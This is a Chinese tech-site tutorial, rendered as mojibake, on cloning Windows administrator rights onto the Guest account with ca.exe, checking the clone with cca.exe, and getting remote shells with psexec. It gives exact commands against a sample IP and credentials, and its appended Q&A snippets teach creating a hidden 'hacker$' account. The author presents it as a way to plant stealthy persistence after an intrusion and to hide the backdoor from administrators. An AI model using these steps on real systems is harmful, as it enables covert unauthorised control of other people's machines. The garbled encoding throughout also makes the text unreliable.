±¾ÎÄËù·ÖÏíµÄ֪ʶµãÊÇ¡¾Ê¹ÓÃCAºÍCCA¿Ë¡ÕË»§Óë¼ì²éÕ˺ÅÊÇ·ñ±»¿Ë¡¹¤¾ßµÄ·½·¨¡¿£¬»¶ÓÄúϲ»¶ÎÒ°®IT¼¼ÊõÍøËù·ÖÏíµÄ½Ì³Ì¡¢ÖªÊ¶¡¢¾Ñé»ò¹¥ÂÔ£¬ÏÂÃæÊÇÏêϸµÄ½²½â¡£
ʹÓÃCAºÍCCA¿Ë¡ÕË»§Óë¼ì²éÕ˺ÅÊÇ·ñ±»¿Ë¡¹¤¾ßµÄ·½·¨
¡¾ÔÀí»ù´¡¡¿
¡¡¡¡¿Ë¡ÕʺŵÄÔÀí¼òµ¥µÄ˵ÊÇÕâÑù£ºÔÚ×¢²á±íÖÐÓÐÁ½´¦±£´æÁËÕʺŵÄSIDÏà¶Ô±êÖ¾·û,Ò»´¦ÊÇSAM\Domains\Account\UsersϵÄ×Ó¼üÃû£¬ÁíÒ»´¦ÊǸÃ×Ó¼üµÄ×ÓÏîFµÄÖµÖС£ÕâÀï΢Èí·¸Á˸ö²»Í¬²½ËüÃǵĴíÎ󣬵ǽʱÓõÄÊǺóÕߣ¬²éѯʱÓõÄÊÇǰÕß¡£µ±ÓÃadminµÄFÏ¸ÇÆäËûÕʺŵÄFÏîºó£¬¾ÍÔì³ÉÁËÕʺÅÊǹÜÀíԱȨÏÞµ«²éѯ»¹ÊÇÔÀ´×´Ì¬µÄÇé¿ö¡£¼´ËùνµÄ¿Ë¡Õʺš£
¡¡¡¡×¢£ºcaºÍccaÐèҪĿ±ê¿ª·Åipc$£¬ÇëÈ·ÈÏ¿ÉÒÔÓëÄ¿±ê½¨Á¢ipc$¡£
¡¡¡¡ca.exe ÊÇÒ»¸ö»ùÓÚwindowsϵͳµÄÔ¶³Ì¿Ë¡Õ˺ʤ¾ß¡£
¡¡¡¡cca.exe ¼ì²éϵͳÊÇ·ñÓпË¡Õ˺š£psexecÊÇÒ»¸öÔ¶³ÌÖ´Ðй¤¾ß£¬Äã¿ÉÒÔÏñʹÓÃtelnetÒ»ÑùʹÓÃËü¡£
¡¡¡¡¡¾ÊµÑé»·¾³¡¿
¡¡¡¡¹¤×÷ƽ̨£ºWindows XP²Ù×÷ϵͳ
¡¡¡¡·þÎñƽ̨£ºVirtual PC Windows 2003
¡¡¡¡¸¨Öúƽ̨£ºVirtual PC Windows XP£¨Ô¶³Ì²âÊÔ£©
¡¡¡¡Èí¼þ£ºca.exe£¨ÏÂÔØµØÖ·£ºhttp://www.sans.org.cn/Soft/294.html £©
¡¡¡¡cca.exe £¨ÏÂÔØµØÖ·£ºhttp://www.sans.org.cn/Soft/295.html £©
¡¡¡¡psexec.exe£¨ÏÂÔØµØÖ·£ºhttp://www.sans.org.cn/Soft/296.html £©
¡¡¡¡¡¾¸úÎÒ²Ù×÷¡¿
¡¡¡¡ÏÂÔØ²¢ÔËÐÐËùÓõÄÈí¼þ¡£CAºÍCCA¼°psexec¶¼ÊÇÔÚÃüÁîÐÐÏÂÔËÐеŤ¾ß£¬ÐèҪͨ¹ý“¿ªÊ¼”->“ÔËÐДÊäÈë“CMD”Çл»µ½ÆäĿ¼²Å¿ÉÒÔÔËÐС£
¡¡¡¡CA¿Ë¡ÕʺÅ
¡¡¡¡1¡¢Ê×ÏÈÐèÒª»ñȡԶ³ÌÖ÷»ú/·þÎñÆ÷µÄ¹ÜÀíԱȨÏÞ£¬¼ÙÉèÎÒÃÇÒѵõ½Ä¿±êÖ÷»úµÄ¹ÜÀíȨÏÞ£¬Ä¿±êÖ÷»úµÄÓû§ÃûΪ£ºAdministrator£¬ÃÜÂëΪ£º123456
¡¡¡¡2¡¢ÔÚMS-DOSÖмüÈëÃüÁca \\192.168.0.230 Administrator “123456” guest 123456
¡¡¡¡¸ÃÃüÁî±íʾIPµØÖ·Îª 192.168.0.230µÄÔ¶³ÌÖ÷»úÖУ¬½«guestÕ˺ſË¡³É¹ÜÀíԱȨÏÞµÄÕ˺Å,¿Ë¡ºóµÄguestÕÊ»§ÃÜÂëΪ123456Èçͼ1Ëùʾ£º
¡¡¡¡

¡¡¡¡Í¼1 ½øÐÐÕʺſË¡
¡¡¡¡µ±ÃüÁîÖ´Ðкó£¬Èç¹ûµÃµ½ÀàËÆÏÂͼÖеĻØÏÔ£¬Ôò˵Ã÷¿Ë¡Õ˺ųɹ¦¡£´Ó»ØÏÔÖÐÎÒÃÇ»¹¿ÉÒÔµÃÖª¿Ë¡Õ˺ŵĴ¦Àí¹ý³ÌÈçͼ2Ëùʾ£º
¡¡¡¡

¡¡¡¡Í¼2 ÕʺſË¡¹ý³Ì
¡¡¡¡ÎªÁËÈÓºóÃÅÕ˺Ŕ¸ü¼ÓÒþ±Î¡£²»»á±»¹ÜÀíÔ±ÇáÒ×·¢ÏÖ£¬»¹ÐèÒª°Ñ¸ÃGuestÕ˺ŽûÓã¬ÕâÑùÒ»À´£¬±ã¿ÉÒÔÔÚÒÔºóµÄÈëÇÖ¹ý³ÌÖÐʹÓøñ»½øÖƵÄGuestÕ˺ÅʵÏÖÔ¶³Ì¿ØÖÆÁË¡£¹ý³Ì£ºÊ×ÏÈÔÚ±¾µØMS-DOSÖмüÈë“psexec \\192.168.0.230 –u Administrator –p “123456” cmd.exe”»ñµÃÔ¶³ÌÖ÷»úµÄÃüÁîÐУ¬È»ºóÔڵõ½µÄÃüÁîÐÐÖмüÈënet user guest /active:noÃüÁîÀ´½ûÓÃGuestÕ˺Źý³ÌÈçͼ3Ëùʾ£º
¡¡¡¡

¡¡¡¡Í¼3 ½ûÓÃguestÕʺÅ
¡¡¡¡Ê¹ÓÃCCA²é¿´ÕʺÅÊÇ·ñ±»¿Ë¡
¡¡¡¡ÔÚÉÏÃæµÄ²½ÖèÖÐÒѾ³É¹¦µÄ°ÑAdministratorµÄȨÏ޳ɹ¦µÄ¿Ë¡µ½ÁËGuestÕ˺ÅÉÏÁË£¬ÏÂÃæ¾ÍÀ´ÑéÖ¤ÕâÒ»¿Ë¡Õ˺ŵĽá¹û£¬ÎÒÃÇʹÓÃÓëCAÅäÌ׵Ť¾ßCCAÀ´ÑéÖ¤¡£¹ý³ÌÈçÏ£º
¡¡¡¡ÔÚMS-DOSÖмüÈ룺cca \\192.168.0.230 Administrator 123456 ÃüÁî²é¿´Ô¶³ÌÖ÷»ú192.168.0.230ÉϵÄAdministratorÕ˺ÅÊÇ·ñ±»¿Ë¡£¬ÊäÈëºó°´»Ø³µ¼üÖ´ÐУ¬Èçͼ4Ëùʾ£º
¡¡¡¡

¡¡¡¡Í¼4 ʹÓÃCCA²é¿´ÕʺÅÊÇ·ñ±»¿Ë¡
¡¡¡¡´ÓÉÏͼ»ØÏÔÖÐ[Guest] AS SAME AS [Administrator]¿ÉÖªAdministratorÕ˺ÅÒѾ±»Guest¿Ë¡¡£
¡¡¡¡ÎªÁ˽øÒ»²½ËµÃ÷ºóÃÅÕ˺ÅÒѾ¿Ë¡³É¹¦£¬ÏÂÃæÍ¨¹ýpsexec.exeÀ´ÑéÖ¤GuesÕ˺ÅÊÇ·ñ¾ßÓйÜÀíԱȨÏÞ£¬ÔÚMS-DOSÖмüÈëÃüÁpsexec \\192.168.0.230 –u guest –p 123456 cmd.exe ºó»Ø³µÖ´ÐС£³É¹¦»ñµÃÔ¶³ÌÖ÷»ú/·þÎñÆ÷µÄÃüÁîÐÐÈçͼ£º
¡¡¡¡

¡¡¡¡Í¼5 ¼ì²âguestÕʺŵĿÉÓÃÐÔ
¡¡¡¡Óɴ˿ɼû¸Ã±»½ûÓõÄGuestÕ˺ſÉÒÔÓÃÀ´ÊµÏÖÔ¶³ÌµÇ½¡£ÕâÑùÎÒÃǾͳɹ¦µÄÍê³ÉÁËÓû§ÕË»§µÄ¿Ë¡£¬¶øÇÒ£¬ÓëÔÕýºÃ¾ßÓÐÏàͬµÄȨÏÞ¡£¡¡¡¡
¹ØÓÚʹÓÃCAºÍCCA¿Ë¡ÕË»§Óë¼ì²éÕ˺ÅÊÇ·ñ±»¿Ë¡¹¤¾ßµÄ·½·¨µÄÏà¹ØÌÖÂÛÈçÏ£º
¡¡¡¡Ïà¹ØÎÊÌ⣺ÔõôÊÖ¶¯¿Ë¡¹ÜÀíÔ±ÕʺÅ
¡¡¡¡´ð£ºÕâÊDZ¾ÈËÈëÇֵľÑ鏸´ó¼Ò¿´¿´ Ï£Íû´ó¼Òѧ»á ÒòΪÏÖÔÚÈëÇÖһ̨Ö÷»úÈÝÒ×µ«ÊDZ£»¤ºÃºÜÄÑ ËùÒÔÎÒ½ÌÒ»ÏÂÊÖ¶¯¿Ë¡¹ÜÀíÔ±Õʺţ¡ c:\>net user hacker$Content$nbsp;123456 /add //ºóÃæ¼Ó$Content$nbsp;ÊÇΪÁËʹÔÚ ¿ØÖÆÌ¨ÏÂÓà net user ¿´²»µ½. È»... >>Ïêϸ
¡¡¡¡Ïà¹ØÎÊÌ⣺xpϵͳÕË»§ÎÊÌâ¼±Çó½â
¡¡¡¡´ð£º¿ÉÒÔ¿Ë¡Òþ²ØÕ˺ţ¬ÕâÑùÕæµÄ¾Í¿ÉÒÔ×öµ½Éñ²»Öª¹í²»¾õÁË¡£ ·½·¨ÈçÏ£º ÏÂÔØCA¿Ë¡Èí¼þ ca.exe СéűàдµÄÒ»¸öÔ¶³Ì¿Ë¡Õ˺ʤ¾ß£¬µ±È»±¾µØ¿Ë¡ҲûÎÊÌâ¡£ Ó÷¨ÈçÏ£ºca ipµØÖ· ¹ÜÀíÔ±Óû§Ãû ¹ÜÀíÔ±ÃÜÂë ¿Ë¡µÄÓû§ ÃÜÂëÈ磺ca 127.0.0.1 administra... >>Ïêϸ
¡¡¡¡Ïà¹ØÎÊÌâ£ºÍøÂç¿Ë¡¹¤¾ß±È½Ï
¡¡¡¡´ð£ºNetBackup ¿É´Óµ¥Ò»¹ÜÀí½çÃæ×Ô¶¯Íê³É¶ą̀·þÎñÆ÷ÉÏǧÃûÓû§µÄÆóÒµ±¸·Ý²Ù×÷£¬²¢¶ÔÄúµÄËùÓд洢É豸¨D¨D¶ÀÁ¢É豸¡¢²¿Ãż¶É豸ºÍÊý¾ÝÖÐÐĵÄÉ豸½øÐÐͳһ¹ÜÀí¡£Ëü¿ÉΪÔÚÒìÀàϵͳ´æ´¢¹Ø¼üÐÅÏ¢²¢½«¹Ø¼üÐÅÏ¢·Ö²¼µ½È«ÇòµÄÆóÒµÌá¸ßÊý¾Ý¿É¿¿ÐÔ¡£ NetBackupר... >>Ïêϸ
- ÆÀÂÛÁÐ±í£¨ÍøÓÑÆÀÂÛ½ö¹©ÍøÓѱí´ï¸öÈË¿´·¨£¬²¢²»±íÃ÷±¾Õ¾Í¬ÒâÆä¹Ûµã»ò֤ʵÆäÃèÊö£©
-
